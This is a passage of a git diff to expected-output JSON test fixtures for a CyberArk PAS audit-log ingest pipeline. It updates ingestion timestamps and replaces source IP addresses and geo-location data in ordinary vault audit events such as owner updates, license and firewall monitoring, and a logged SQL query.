@@ -404,8 +344,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474097700Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329048300Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -432,19 +372,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -465,7 +394,7 @@ "PVWAAppUsers" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -474,7 +403,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:18Z", "safe": "PSM", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Update Owner", "source_user": "PVWAAppUsers", "message": "Update Owner", 
@@ -488,8 +417,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474100Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329053800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -516,20 +445,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -550,7 +467,7 @@ "Auditors" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -559,8 +476,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:14Z", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e33\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e33\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate 
Owner\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Update Owner", "source_user": "Auditors", "message": "Update Owner", 
@@ -574,8 +491,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474102300Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update 
Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329059300Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json index 6a5642c4086..b59939c142f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor license expiration date start", - "ingested": "2021-06-09T10:24:33.660154700Z", + "ingested": "2021-12-09T13:36:58.163764700Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"355\",\"Desc\":\"Monitor License Expiration Date start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date start\",\"GatewayStation\":\"\"}}}", "code": "355", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json index d61c7cb5bd5..319f3cfcc3a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor license expiration date end", - "ingested": "2021-06-09T10:24:33.682528300Z", + "ingested": "2021-12-09T13:36:58.261598700Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"356\",\"Desc\":\"Monitor License Expiration Date end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date end\",\"GatewayStation\":\"\"}}}", "code": "356", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json index 0791b48895e..13412bbe6b3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-06-09T10:24:33.706025600Z", + "ingested": "2021-12-09T13:36:58.358906700Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-06-09T10:24:33.706037Z", + "ingested": "2021-12-09T13:36:58.358915100Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json index 0b269950ba6..9c47570daba 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-06-09T10:24:33.740907200Z", + "ingested": "2021-12-09T13:36:58.519410400Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-06-09T10:24:33.740920600Z", + "ingested": "2021-12-09T13:36:58.519418700Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json index f03213f7863..32bd76af23a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json 
@@ -102,7 +102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776957500Z", + "ingested": "2021-12-09T13:36:58.683100800Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT USER FROM 
DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
